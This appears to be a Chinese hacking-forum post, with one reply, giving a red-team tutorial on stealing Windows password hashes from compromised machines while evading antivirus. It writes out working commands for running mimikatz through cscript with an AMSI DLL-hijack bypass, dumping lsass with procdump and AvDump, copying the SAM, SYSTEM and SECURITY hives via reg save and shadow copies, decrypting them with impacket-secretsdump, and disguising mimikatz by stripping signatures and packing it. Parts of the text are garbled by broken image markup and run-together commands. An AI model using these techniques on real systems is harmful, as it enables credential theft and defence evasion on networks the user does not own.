抓取HASH的10001种方法

https://www.ihonker.org/data/att ... 82c00e3cd.png");background-position: left top;background-repeat: no-repeat;background-size: 30px;overflow-wrap: break-word !important;box-sizing: border-box !important;">

https://www.ihonker.org/data/att ... d153ee862.png");background-position: right bottom;background-size: 30px;background-repeat: no-repeat;overflow-wrap: break-word !important;box-sizing: border-box !important;">

前言

在我们内网拿下机器时候，总会需要去抓取机器账户 HASH 值，但是往往大部分情况下机器存在杀软，有杀软的情况下服务器第一时间就干掉了最爱的 mimikatz。

我们需要更多的方法去抓取 HASH，常见的方法就不再详细举例了。

Net4.0 执行读取

下载 xml 文件

https://www.ihonker.org/data/attachment/forum/202103/05/4f0615c49af280507e5985676a2bfefd.png" data-type="png" data-w="829" style="width: 100%;height: auto;" />

JS 加载

cscript mimikatz.js

它已经能被一些敏感的 AV 识别，我们可以对其进行 bypass，通过 DLL 劫持绕过。发现在 ProcessMonitor 可以看到进程调用 C:\Windows\System32\amsi.dll

我们直接对其 DLL 劫持即可。

copy c:\windows\system32\cscript amsi.dllasmi.dll 11.js

如何生成 mimikatz 的 js 版本，可以参考看下面的介绍。

https://www.ihonker.org/data/attachment/forum/202103/05/44f00d72ee46996aba3aaaa96ddbb9a8.png" data-type="png" data-w="1146" style="width: 100%;height: auto;" />

这里用 csc 生成了 base64 加密的版本，再用使用 javascript 启动内存中的 mimikatz。

wmic 调用

本地：wmic process list /FORMAT:evil.xsl

远程：wmic os get /FORMAT:"https://www.ihonker.org/data/attachment/forum/202103/05/271d4e4a726ded996f96c960619a24e4.png" data-type="png" data-w="894" style="width: 100%;height: auto;"  />
Internal Monologue Attack
https://www.ihonker.org/data/attachment/forum/202103/05/0f2058f006638d2b268dd087f75820ab.png" data-type="png" data-w="1280" style="width: 100%;height: auto;"  />
Bypass
部分杀软很变态能够将这些杀死，我们可以用几个方法将其绕过，转储 LASS，读取系统文件，制作新的 Bypassmimikazi 等等。
Procdump
官方介绍：ProcDump 是一个命令行实用程序，其主要目的是监视应用程序中的 CPU 尖峰并在尖峰期间生成崩溃转储，管理员或开发人员可以使用它来确定尖峰原因。ProcDump 还包括挂起的窗口监视，未处理的异常监视，并且可以基于系统性能计数器的值生成转储。它也可以用作常规流程转储实用程序。
大家都熟知的 Procdump，由于它是微软官方的签名，所以我们能通过它 bypass 某些不怎么样的杀软来 dump 出 lass 存储的密码。
执行如下命令
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
在本机的上面跑 mimikazi 进行密码的成功查看
Avdump
Avdump.exe 是在 Avast HomeSecurity 产品套件一起提供的小工具。顾名思义，该实用程序将给定进程标识符的内存转储到用户指定的位置。我们可以通过它进行新的 dump 方式利用。
它自带 Avast 杀软公司白签名。
我们直接运行即可。
.\AvDump.exe --pid 696 --exception_ptr 0 --dump_level 1 --thread_id 0--min_interval 0 --dump_file e:\tmp\last.dmp
在本机的上面跑 mimikazi 进行密码的成功查看。

SAM 解密
像一些变态的 EDR，会禁用 Procdump、Minidump 等⽅式转储 lsass 进程，我们可以换一种方法。
SAM 它是安全帐户管理器。⽤于存储⽤户和 hash，可以⽤来验证本地和远程⽤户。
要解密 hash，我们需要获取到 SAM SYSTEM SECURITY 这三个⽂件。只要有这3个文件我们就能进行读取。

注册表复值
REG SAVE 将指定的子项、项和注册表值的副本保存到指定文件中，直接保存就完事了。
reg save hklm\system SYSTEMreg save hklm\sam SAMreg save hklm\security SECURITY
卷影复制
通过拷⻉卷影副本卷中的⽂件来读取 3 个文件
先创建 c 盘的 shadowscopy
wmic shadowcopy call create volume='c：\'

列出 shadows 的 list，从中并选择卷影副本卷，再复制我们需要的三个文件。
vssadmin list shadowscopy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\sam.copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\security.copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\Windows\system32\config\system.
解密恢复 HASH
通过上面几种方法拿到 3 个文件后，我们用 impacket-secretsdump 来进行解密。
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
用得到的 HASH 直接去解密即可。

mimikatz 免杀
除此之外我们还可以对 MIMIKAZi 进行免杀的处理。
一般的方法是删除代码层 MIMIKATZ 特征，默认资源，如 ICO 图标，替换 bin 包内容。
混淆编译完程序(加壳)，克隆签名等等。
替换删除敏感词/修改图标 ico
修改 rc 特征。
利用Hex找出一些敏感 DLL,函数如 wdigest.dll，isbase64interceptinput 等等进行替换
替换敏感的 bin 文件中方法指定成系统自带的 dll 方法
netapi32
系统中 netapi32.dll 文件
创建 bin 文件并将其方法指定成系统的 function。
最后使用 themdia 加壳后再运行。
成功运行无报警。

总结
随着 AV 查杀，态势行为特征扫描的发展，利用的难度也越来越大，我们也需要不断提高自身的姿势水平，学习更好的方法来进行红蓝对抗。

热心网友3

看起来帖子内容被样式代码覆盖了，正文部分好像没有显示出来。楼主是想分享抓取 hash 的各种方法吗？能麻烦重新编辑一下，把核心内容贴出来吗？对这方面很感兴趣，期待你的干货！